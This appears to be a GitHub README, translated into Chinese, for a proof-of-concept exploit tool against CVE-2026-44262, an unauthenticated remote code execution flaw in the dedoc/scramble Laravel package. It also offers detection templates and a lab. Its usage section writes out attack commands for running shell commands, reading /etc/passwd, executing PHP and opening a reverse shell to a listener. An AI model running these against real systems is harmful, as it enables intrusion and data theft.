joshuavanderpoll/CVE-2026-44262

GitHub: joshuavanderpoll/CVE-2026-44262

针对 dedoc/scramble Laravel API 文档生成器的未授权远程代码执行漏洞(CVE-2026-44262)提供完整的 PoC 利用脚本及 Nmap NSE、Nuclei 检测模板。

Stars: 1 | Forks: 0

dedoc/scramble RCE (CVE-2026-44262) PoC

Python Nmap NSE Nuclei Template

## 📜 描述 CVE-2026-44262 是 [dedoc/scramble](https://github.com/dedoc/scramble)(一个 Laravel API 文档生成器)中的一个未经身份验证的远程代码执行漏洞。 `NodeRulesEvaluator::doEvaluateExpression()` 在执行 `eval("return $code;")` 之前调用了 `extract($variables)`。当控制器将 `$request->input()` 赋值给一个名为 `$code` 的变量并将其用作验证规则时,Scramble 会跟踪该变量并将其传入 eval 作用域。攻击者可以通过向 `/docs/api.json` 提供精心构造的查询参数来使用任意 PHP 覆盖 `$code`。 **受影响版本:** `dedoc/scramble >=0.13.2, <0.13.22` ## ✨ 功能 - **自动检测** — 扫描 OpenAPI 规范以自动发现易受攻击的参数 - **延时探测** — 使用 `sleep()` 进行安全的非破坏性检查,以确认 eval 被触发 - **命令执行** — 运行 shell 命令并直接从 HTTP 响应中捕获输出 - **文件读取** — 从目标文件系统读取任意文件 - **PHP 代码执行** — 通过 RCE 执行原始 PHP 代码 - **反弹 Shell** — PHP `proc_open` 反弹 shell,无需 bash 或 busybox - **批量扫描** — 从文件中扫描多个目标 - **操作系统检测** — 自动检测 Windows/Linux/Darwin 并相应地调整 payload - **Nmap NSE** — 被动 + 延时检测脚本 (`http-scramble-rce-detect.nse`) - **Nuclei 模板** — 带有延时确认的两步检测 (`CVE-2026-44262.yaml`) ## 🛠️ 安装 无外部依赖 —— 仅使用 Python 标准库。 ### macOS / Linux ``` git clone https://github.com/joshuavanderpoll/CVE-2026-44262.git cd CVE-2026-44262 python3 CVE-2026-44262.py --target http://example.com/docs/api ``` ### Windows ``` git clone https://github.com/joshuavanderpoll/CVE-2026-44262.git cd CVE-2026-44262 python3 CVE-2026-44262.py --target http://example.com/docs/api ``` ## ⚙️ 用法 ``` usage: CVE-2026-44262.py [-h] (--target TARGET | --targets FILE) [--docs-path PATH] [--check] [--command CMD] [--code PHP] [--read-file PATH] [--shell] [--lhost HOST] [--lport PORT] [--os OS] [--useragent USERAGENT] [--timeout SECONDS] ``` ### 检测 ``` # Full detection (timing + exec probe) python3 CVE-2026-44262.py --target http://example.com/docs/api # Safe check only — timing probe, no command execution python3 CVE-2026-44262.py --target http://example.com/docs/api --check # Override JSON endpoint path python3 CVE-2026-44262.py --target http://example.com/docs/api --docs-path /api/openapi.json # Bulk scan python3 CVE-2026-44262.py --targets targets.txt ``` ### 漏洞利用 ``` # 执行命令 python3 CVE-2026-44262.py --target http://example.com/docs/api --command "whoami" # 读取文件 python3 CVE-2026-44262.py --target http://example.com/docs/api --read-file /etc/passwd # 执行原始 PHP python3 CVE-2026-44262.py --target http://example.com/docs/api --code "echo php_uname();" # Reverse shell (start: nc -lv 4444) python3 CVE-2026-44262.py --target http://example.com/docs/api --shell --lhost 172.17.0.1 --lport 4444 ``` ### Nmap & Nuclei(被动 + 延时,无漏洞利用) ``` # Nmap nmap -p 80,443 --script http-scramble-rce-detect example.com # Nuclei nuclei -t CVE-2026-44262.yaml -u http://example.com ``` ## 🐋 Docker 实验 包含了一个带有易受攻击应用 (dedoc/scramble v0.13.21) 的独立 Docker 环境。 详情请参阅 [docker/DOCKER.md](docker/DOCKER.md)。 ``` cd docker/ docker compose up -d python3 ../CVE-2026-44262.py --target http://localhost:8000/docs/api ``` ## 🕵🏼 参考 - [dedoc/scramble](https://github.com/dedoc/scramble) - [GitHub 安全通告 — GHSA-4rm2-28vj-fj39](https://github.com/advisories/GHSA-4rm2-28vj-fj39) - [NVD — CVE-2026-44262](https://nvd.nist.gov/vuln/detail/CVE-2026-44262) - [HackIndex.io — CVE-2026-44262](https://hackindex.io/vulnerabilities/CVE-2026-44262) ## 📢 免责声明 本工具仅供教育和研究目的提供。创作者对因使用本工具而造成的任何误用或损害不承担任何责任。
标签:CISA项目, CVE-2026-44262, dedoc/scramble, Google, Laravel, Maven, Nmap NSE, Nuclei, OpenAPI, PHP代码执行, PoC, Web安全, 反弹Shell, 文件读取, 无服务器架构, 暴力破解, 未授权RCE, 漏洞验证, 编程工具, 网络安全, 网络安全审计, 蓝队分析, 请求拦截, 远程代码执行, 逆向工具, 隐私保护